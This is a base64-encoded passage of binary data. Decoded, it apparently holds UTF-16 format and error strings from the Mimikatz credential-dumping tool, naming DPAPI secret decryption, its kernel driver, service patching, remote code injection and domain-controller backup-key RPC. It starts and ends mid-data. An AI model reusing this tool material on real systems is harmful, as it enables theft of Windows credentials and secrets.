HgAIAAtACAAJQB1AAoAAAAAAAAAAAAAACUAKgBzACAAIABhAGwAZwBIAGEAcwBoACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAgACgAJQBzACkACgAAAAAAAAAAACUAKgBzACAAIAByAG8AdQBuAGQAcwAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAHMAaQBkAEwAZQBuACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAAACUAKgBzACAAIABhAGwAZwBDAHIAeQBwAHQAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAgACgAJQBzACkACgAAAAAAAAAAACUAKgBzACAAIABzAGgAYQAxAEwAZQBuACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAG0AZAA0AEwAZQBuACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAUwBhAGwAdAAgACAAIAAgACAAIAA6ACAAAAAAAAAAJQAqAHMAIAAgAFMAaQBkACAAIAAgACAAIAAgACAAOgAgAAAAAAAAACUAKgBzACAAIABwAFMAZQBjAHIAZQB0ACAAIAAgADoAIAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AYgBsAG8AYgAgADsAIABDAHIAeQBwAHQARABlAGMAcgB5AHAAdAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBiAGwAbwBiACAAOwAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAGwAbwBzAGUAXwBoAHAAcgBvAHYAXwBkAGUAbABlAHQAZQBfAGMAbwBuAHQAYQBpAG4AZQByACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBiAGwAbwBiACAAOwAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBoAGsAZQB5AF8AcwBlAHMAcwBpAG8AbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AbQBhAHMAdABlAHIAawBlAHkAXwB3AGkAdABoAF8AcwBoAGEARABlAHIAaQB2AGUAZABrAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AYwBsAG8AcwBlAF8AaABwAHIAbwB2AF8AZABlAGwAZQB0AGUAXwBjAG8AbgB0AGEAaQBuAGUAcgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AbQBhAHMAdABlAHIAawBlAHkAXwB3AGkAdABoAF8AcwBoAGEARABlAHIAaQB2AGUAZABrAGUAeQAgADsAIABrAHUAbABsAF8AbQBfAGMAcgB5AHAAdABvAF8AaABrAGUAeQBfAHMAZQBzAHMAaQBvAG4AIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAGQAbwBtAGEAaQBuAGsAZQB5AF8AdwBpAHQAaABfAGsAZQB5ACAAOwAgAEMAcgB5AHAAdABEAGUAYwByAHkAcAB0ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AZABwAGEAcABpAF8AdQBuAHAAcgBvAHQAZQBjAHQAXwBkAG8AbQBhAGkAbgBrAGUAeQBfAHcAaQB0AGgAXwBrAGUAeQAgADsAIABDAHIAeQBwAHQAUwBlAHQASwBlAHkAUABhAHIAYQBtACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGQAcABhAHAAaQBfAHUAbgBwAHIAbwB0AGUAYwB0AF8AZABvAG0AYQBpAG4AawBlAHkAXwB3AGkAdABoAF8AawBlAHkAIAA7ACAAawB1AGwAbABfAG0AXwBjAHIAeQBwAHQAbwBfAGMAbABvAHMAZQBfAGgAcAByAG8AdgBfAGQAZQBsAGUAdABlAF8AYwBvAG4AdABhAGkAbgBlAHIAIAAoADAAeAAlADAAOAB4ACkACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAGMAcgBlAGQAaABpAHMAdABfAGUAbgB0AHIAeQBfAHcAaQB0AGgAXwBzAGgAYQBEAGUAcgBpAHYAZQBkAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBjAGwAbwBzAGUAXwBoAHAAcgBvAHYAXwBkAGUAbABlAHQAZQBfAGMAbwBuAHQAYQBpAG4AZQByACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBkAHAAYQBwAGkAXwB1AG4AcAByAG8AdABlAGMAdABfAGMAcgBlAGQAaABpAHMAdABfAGUAbgB0AHIAeQBfAHcAaQB0AGgAXwBzAGgAYQBEAGUAcgBpAHYAZQBkAGsAZQB5ACAAOwAgAGsAdQBsAGwAXwBtAF8AYwByAHkAcAB0AG8AXwBoAGsAZQB5AF8AcwBlAHMAcwBpAG8AbgAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAG8AbgBfAHUAbgBwAHIAbwB0AGUAYwB0AAAAAAAAAAAAbwBuAF8AcAByAG8AdABlAGMAdAAAAAAAcgBlAHMAZQByAHYAZQBkAAAAAAAAAAAAcwB0AHIAbwBuAGcAAAAAAHIAZQBxAHUAaQByAGUAXwBzAHQAcgBvAG4AZwAAAAAAJQBzACAAOwAgAAAAAAAAAHUAaQBfAGYAbwByAGIAaQBkAGQAZQBuAAAAAAAAAAAAdQBuAGsAbgBvAHcAbgAAAGMAcgBlAGQAXwBzAHkAbgBjAAAAAAAAAGEAdQBkAGkAdAAAAAAAAABuAG8AXwByAGUAYwBvAHYAZQByAHkAAAB2AGUAcgBpAGYAeQBfAHAAcgBvAHQAZQBjAHQAaQBvAG4AAAAAAAAAYwByAGUAZABfAHIAZQBnAGUAbgBlAHIAYQB0AGUAAABzAHkAcwB0AGUAbQAAAAAAcAByAG8AbQBwAHQAXwBvAG4AXwB1AG4AcAByAG8AdABlAGMAdAAAAHAAcgBvAG0AcAB0AF8AbwBuAF8AcAByAG8AdABlAGMAdAAAAAAAAABwAHIAbwBtAHAAdABfAHMAdAByAG8AbgBnAAAAAAAAAAAAAAAAAAAACgA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0ACgBCAGEAcwBlADYANAAgAG8AZgAgAGYAaQBsAGUAIAA6ACAAJQBzAAoAPQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AAoAAAAlAGMAAAAAAD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQA9AD0APQAKAAAAAAAAACUAKgBzAEQAaQByAGUAYwB0AG8AcgB5ACAAJwAlAHMAJwAAAAAAAAAgACgAJQBzACkAAABcAAAAKgAAAC4AAAAuAC4AAAAAACUAKgBzACUAMwB1ACAAJQBjAHwAJwAlAHMAJwAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbABfAGgAYQBuAGQAbABlACAAOwAgAEQAZQB2AGkAYwBlAEkAbwBDAG8AbgB0AHIAbwBsACAAKAAwAHgAJQAwADgAeAApACAAOgAgADAAeAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbAAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABcAFwALgBcAG0AaQBtAGkAZAByAHYAAAAlACoAcwAqACoASwBFAFkAIAAoAGMAYQBwAGkAKQAqACoACgAAAAAAAAAAAAAAAAAlACoAcwAgACAAZAB3AFUAbgBpAHEAdQBlAE4AYQBtAGUATABlAG4AIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABkAHcAUwBpAFAAdQBiAGwAaQBjAEsAZQB5AEwAZQBuACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBTAGkAUAByAGkAdgBhAHQAZQBLAGUAeQBMAGUAbgAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAlACoAcwAgACAAZAB3AEUAeABQAHUAYgBsAGkAYwBLAGUAeQBMAGUAbgAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABkAHcARQB4AFAAcgBpAHYAYQB0AGUASwBlAHkATABlAG4AIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAGQAdwBIAGEAcwBoAEwAZQBuACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAlACoAcwAgACAAZAB3AFMAaQBFAHgAcABvAHIAdABGAGwAYQBnAEwAZQBuACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAACUAKgBzACAAIABkAHcARQB4AEUAeABwAG8AcgB0AEYAbABhAGcATABlAG4AIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAJQAqAHMAIAAgAHAAVQBuAGkAcQB1AGUATgBhAG0AZQAgACAAIAAgACAAIAAgACAAOgAgAAAAAAAlAFMACgAAACUAKgBzACAAIABwAEgAYQBzAGgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAJQAqAHMAIAAgAHAAUwBpAFAAdQBiAGwAaQBjAEsAZQB5ACAAIAAgACAAIAAgACAAOgAgAAAAAAAlACoAcwAgACAAcABTAGkAUAByAGkAdgBhAHQAZQBLAGUAeQAgACAAIAAgACAAIAA6AAoAAAAAACUAKgBzACAAIABwAFMAaQBFAHgAcABvAHIAdABGAGwAYQBnACAAIAAgACAAIAAgADoACgAAAAAAJQAqAHMAIAAgAHAARQB4AFAAdQBiAGwAaQBjAEsAZQB5ACAAIAAgACAAIAAgACAAOgAgAAAAAAAlACoAcwAgACAAcABFAHgAUAByAGkAdgBhAHQAZQBLAGUAeQAgACAAIAAgACAAIAA6AAoAAAAAACUAKgBzACAAIABwAEUAeABFAHgAcABvAHIAdABGAGwAYQBnACAAIAAgACAAIAAgADoACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAGsAZQB5AF8AYwBuAGcAXwBjAHIAZQBhAHQAZQAgADsAIABrAHUAbABsAF8AbQBfAGsAZQB5AF8AYwBuAGcAXwBwAHIAbwBwAGUAcgB0AGkAZQBzAF8AYwByAGUAYQB0AGUAIAAoAHAAdQBiAGwAaQBjACkACgAAAAAAAAAAACUAKgBzACoAKgBLAEUAWQAgACgAYwBuAGcAKQAqACoACgAAAAAAAAAlACoAcwAgACAAZAB3AFYAZQByAHMAaQBvAG4AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACAAIAB1AG4AawAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAGQAdwBOAGEAbQBlAEwAZQBuACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAdAB5AHAAZQAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACAAIABkAHcAUAB1AGIAbABpAGMAUAByAG8AcABlAHIAdABpAGUAcwBMAGUAbgAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAJQAqAHMAIAAgAGQAdwBQAHIAaQB2AGEAdABlAFAAcgBvAHAAZQByAHQAaQBlAHMATABlAG4AOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAlACoAcwAgACAAZAB3AFAAcgBpAHYAYQB0AGUASwBlAHkATABlAG4AIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAACUAKgBzACAAIAB1AG4AawBBAHIAcgBhAHkAWwAxADYAXQAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAAAAAAAAlACoAcwAgACAAcABOAGEAbQBlACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAA6ACAAAAAAAAAAJQAuACoAcwAKAAAAAAAAACUAKgBzACAAIABwAFAAdQBiAGwAaQBjAFAAcgBvAHAAZQByAHQAaQBlAHMAIAAgACAAIAAgADoAIAAAAAAAAAAlACoAcwAgACAAcABQAHIAaQB2AGEAdABlAFAAcgBvAHAAZQByAHQAaQBlAHMAIAAgACAAIAA6AAoAAAAAAAAAJQAqAHMAIAAgAHAAUAByAGkAdgBhAHQAZQBLAGUAeQAgACAAIAAgACAAIAAgACAAIAAgACAAOgAKAAAAAAAAACUAKgBzACoAKgBLAEUAWQAgAEMATgBHACAAUABSAE8AUABFAFIAVABZACoAKgAKAAAAAAAAAAAAAAAAAAAAAAAlACoAcwAgACAAZAB3AFMAdAByAHUAYwB0AEwAZQBuACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAAAAAAAAAACUAKgBzACAAIAB0AHkAcABlACAAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAAAAAAAAAAAAAJQAqAHMAIAAgAHUAbgBrACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAOgAgACUAMAA4AHgAIAAtACAAJQB1AAoAAAAAAAAAAAAAAAAAAAAlACoAcwAgACAAZAB3AE4AYQBtAGUATABlAG4AIAAgACAAIAAgACAAIAA6ACAAJQAwADgAeAAgAC0AIAAlAHUACgAAAAAAAAAAAAAAAAAAACUAKgBzACAAIABkAHcAUAByAG8AcABlAHIAdAB5AEwAZQBuACAAIAAgADoAIAAlADAAOAB4ACAALQAgACUAdQAKAAAAAAAAACUAKgBzACAAIABwAE4AYQBtAGUAIAAgACAAIAAgACAAIAAgACAAIAAgADoAIAAAACUAKgBzACAAIABwAFAAcgBvAHAAZQByAHQAeQAgACAAIAAgACAAIAAgADoAIAAAACUAdQAgAGYAaQBlAGwAZAAoAHMAKQAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAG4AZQB0AF8AZwBlAHQARABDACAAOwAgAEQAcwBHAGUAdABEAGMATgBhAG0AZQA6ACAAJQB1AAoAAABhAAAAIgAlAHMAIgAgAHMAZQByAHYAaQBjAGUAIABwAGEAdABjAGgAZQBkAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaAAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAHIAbwBjAGUAcwBzAF8AZwBlAHQAVgBlAHIAeQBCAGEAcwBpAGMATQBvAGQAdQBsAGUASQBuAGYAbwByAG0AYQB0AGkAbwBuAHMARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAATwBwAGUAbgBQAHIAbwBjAGUAcwBzACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoAF8AZwBlAG4AZQByAGkAYwBQAHIAbwBjAGUAcwBzAE8AcgBTAGUAcgB2AGkAYwBlAEYAcgBvAG0AQgB1AGkAbABkACAAOwAgAFMAZQByAHYAaQBjAGUAIABpAHMAIABuAG8AdAAgAHIAdQBuAG4AaQBuAGcACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABrAHUAbABsAF8AbQBfAHMAZQByAHYAaQBjAGUAXwBnAGUAdABVAG4AaQBxAHUAZQBGAG8AcgBOAGEAbQBlACAAKAAwAHgAJQAwADgAeAApAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABJAG4AYwBvAHIAcgBlAGMAdAAgAHYAZQByAHMAaQBvAG4AIABpAG4AIAByAGUAZgBlAHIAZQBuAGMAZQBzAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8ATwBwAGUAbgBBAG4AZABRAHUAZQByAHkAVwBpAHQAaABBAGwAbABvAGMAIAA7ACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBSAGUAZwBRAHUAZQByAHkAVgBhAGwAdQBlAEUAeAAgAEsATwAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAZwBpAHMAdAByAHkAXwBPAHAAZQBuAEEAbgBkAFEAdQBlAHIAeQBXAGkAdABoAEEAbABsAG8AYwAgADsAIABwAHIAZQAgAC0AIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAFIAZQBnAFEAdQBlAHIAeQBWAGEAbAB1AGUARQB4ACAASwBPAAoAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBnAGkAcwB0AHIAeQBfAE8AcABlAG4AQQBuAGQAUQB1AGUAcgB5AFcAaQB0AGgAQQBsAGwAbwBjACAAOwAgAGsAdQBsAGwAXwBtAF8AcgBlAGcAaQBzAHQAcgB5AF8AUgBlAGcATwBwAGUAbgBLAGUAeQBFAHgAIABLAE8ACgAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAGMAcgBlAGEAdABlACAAOwAgAFIAdABsAEMAcgBlAGEAdABlAFUAcwBlAHIAVABoAHIAZQBhAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAA7ACAAQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAFQAaAAgAEAAIAAlAHAACgBEAGEAIABAACAAJQBwAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBjAHIAZQBhAHQAZQAgADsAIABrAHUAbABsAF8AbQBfAGsAZQByAG4AZQBsAF8AaQBvAGMAdABsAF8AaABhAG4AZABsAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGMAbwBwAHkAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUAIAA7ACAAawB1AGwAbABfAG0AXwBtAGUAbQBvAHIAeQBfAGEAbABsAG8AYwAgAC8AIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEUAeAApACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAEMAbwBkAGUAVwBpAHQAdABoAFAAYQB0AHQAZQByAG4AUgBlAHAAbABhAGMAZQAgADsAIABOAG8AIABiAHUAZgBmAGUAcgAgAD8ACgAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAFIAcABjAEIAaQBuAGQAaQBuAGcAUwBlAHQATwBwAHQAaQBvAG4AOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAFIAcABjAEIAaQBuAGQAaQBuAGcAUwBlAHQAQQB1AHQAaABJAG4AZgBvAEUAeAA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAE4AbwAgAEIAaQBuAGQAaQBuAGcAIQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBjAHIAZQBhAHQAZQBCAGkAbgBkAGkAbgBnACAAOwAgAFIAcABjAEIAaQBuAGQAaQBuAGcARgByAG8AbQBTAHQAcgBpAG4AZwBCAGkAbgBkAGkAbgBnADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AYwByAGUAYQB0AGUAQgBpAG4AZABpAG4AZwAgADsAIABSAHAAYwBTAHQAcgBpAG4AZwBCAGkAbgBkAGkAbgBnAEMAbwBtAHAAbwBzAGUAOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8ARwBlAG4AZQByAGkAYwBfAEQAZQBjAG8AZABlACAAOwAgAFIAUABDACAARQB4AGMAZQBwAHQAaQBvAG4AOgAgADAAeAAlADAAOAB4ACAAKAAlAHUAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBHAGUAbgBlAHIAaQBjAF8ARABlAGMAbwBkAGUAIAA7ACAATQBlAHMASQBuAGMAcgBlAG0AZQBuAHQAYQBsAEgAYQBuAGQAbABlAFIAZQBzAGUAdAA6ACAAJQAwADgAeAAKAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBHAGUAbgBlAHIAaQBjAF8ARABlAGMAbwBkAGUAIAA7ACAATQBlAHMARABlAGMAbwBkAGUASQBuAGMAcgBlAG0AZQBuAHQAYQBsAEgAYQBuAGQAbABlAEMAcgBlAGEAdABlADoAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8ARwBlAG4AZQByAGkAYwBfAEYAcgBlAGUAIAA7ACAAUgBQAEMAIABFAHgAYwBlAHAAdABpAG8AbgA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBHAGUAbgBlAHIAaQBjAF8ARgByAGUAZQAgADsAIABNAGUAcwBEAGUAYwBvAGQAZQBJAG4AYwByAGUAbQBlAG4AdABhAGwASABhAG4AZABsAGUAQwByAGUAYQB0AGUAOgAgACUAMAA4AHgACgAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBHAGUAbgBlAHIAaQBjAF8ARQBuAGMAbwBkAGUAIAA7ACAAUgBQAEMAIABFAHgAYwBlAHAAdABpAG8AbgA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAEcAZQBuAGUAcgBpAGMAXwBFAG4AYwBvAGQAZQAgADsAIABNAGUAcwBJAG4AYwByAGUAbQBlAG4AdABhAGwASABhAG4AZABsAGUAUgBlAHMAZQB0ADoAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAEcAZQBuAGUAcgBpAGMAXwBFAG4AYwBvAGQAZQAgADsAIABNAGUAcwBFAG4AYwBvAGQAZQBJAG4AYwByAGUAbQBlAG4AdABhAGwASABhAG4AZABsAGUAQwByAGUAYQB0AGUAOgAgACUAMAA4AHgACgAAAAAAAABQAHIAbwB0AGUAYwB0AGUAZABTAHQAbwByAGEAZwBlAAAAAAAAAAAAXABwAGkAcABlAFwAcAByAG8AdABlAGMAdABlAGQAXwBzAHQAbwByAGEAZwBlAAAAbgBjAGEAYwBuAF8AbgBwAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AYgBrAHIAcABfAGcAZQBuAGUAcgBpAGMAIAA7ACAAQgBhAGMAawB1AHAAcgBLAGUAeQA6ACAAMAB4ACUAMAA4AHgAIAAoACUAdQApAAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBiAGsAcgBwAF8AZwBlAG4AZQByAGkAYwAgADsAIABSAFAAQwAgAEUAeABjAGUAcAB0AGkAbwBuADoAIAAwAHgAJQAwADgAeAAgACgAJQB1ACkACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBSAHAAYwBTAGUAYwB1AHIAaQB0AHkAQwBhAGwAbABiAGEAYwBrACAAOwAgAFEAdQBlAHIAeQBDAG8AbgB0AGUAeAB0AEEAdAB0AHIAaQBiAHUAdABlAHMAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBwAGMAXwBkAHIAcwByAF8AUgBwAGMAUwBlAGMAdQByAGkAdAB5AEMAYQBsAGwAYgBhAGMAawAgADsAIABJAF8AUgBwAGMAQgBpAG4AZABpAG4AZwBJAG4AcQBTAGUAYwB1AHIAaQB0AHkAQwBvAG4AdABlAHgAdAAgACUAMAA4AHgACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAHAAYwBfAGQAcgBzAHIAXwBnAGUAdABEAG8AbQBhAGkAbgBBAG4AZABVAHMAZQByAEkAbgBmAG8AcwAgADsAIABEAG8AbQBhAGkAbgBDAG8AbgB0AHIAbwBsAGwAZQByAEkAbgBmAG8AOgAgAEQAQwAgACcAJQBzACcAIABuAG8AdAAgAGYAbwB1AG4AZAAKAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAcABjAF8AZAByAHMAcgBfAGcAZQB0AEQAbwBtAGEAaQBuAEEAbgBkAFUAcwBlAHIASQBuAGYAbwBzACAAOwAgAEQAbwBtAGEAaQBuAEMAbwBuAHQAcgBvAGwAbABlAHIASQBuAGYAbwA6ACAAYgBhAGQAIAB2AGUAcgBzAGkAbwBuACAAKAAlAHUAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAd